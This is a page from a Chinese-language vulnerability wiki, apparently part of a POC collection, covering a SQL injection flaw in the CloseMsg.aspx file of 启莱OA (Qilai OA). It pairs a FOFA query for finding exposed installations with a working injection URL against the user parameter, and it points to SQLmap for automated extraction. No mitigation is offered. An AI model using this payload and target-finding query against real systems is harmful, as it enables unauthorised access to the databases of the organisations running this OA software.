menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 启莱OA chevron_right 启莱OA CloseMsg.aspx SQL注入漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    启莱OA CloseMsg.aspx SQL注入漏洞.md
    1.17 KB / 2021-07-04 06:01:08
        # 启莱OA CloseMsg.aspx SQL注入漏洞
    
    ## 漏洞描述
    
    启莱OA CloseMsg.aspx文件存在SQL注入漏洞,攻击者通过漏洞可以获取数据库敏感信息
    
    ## 漏洞影响
    
    > [!NOTE]
    >
    > 启莱OA
    
    ## FOFA
    
    > [!NOTE]
    >
    > app="启莱OA"
    
    ## 漏洞复现
    
    登录页面如下
    
    ![](D:\知识星球\image\ql-1-1621166871878.png?x-oss-process=image/auto-orient,1/quality,q_90/watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10)
    
    存在SQL注入的文件为 CloseMsg.aspx 
    
    ```
    http://xxx.xxx.xxx.xxx/client/CloseMsg.aspx?user=' and (select db_name())>0--&pwd=1
    ```
    
    
    
    ![](http://wikioss.peiqi.tech/vuln/ql-6.png?x-oss-process=image/auto-orient,1/quality,q_90/watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10)
    
    使用SQLmap对参数 user 进行注入
    
    ![](http://wikioss.peiqi.tech/vuln/ql-7.png?x-oss-process=image/auto-orient,1/quality,q_90/watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10)
    
    ## Goby & POC
    
    
    
    links
    file_download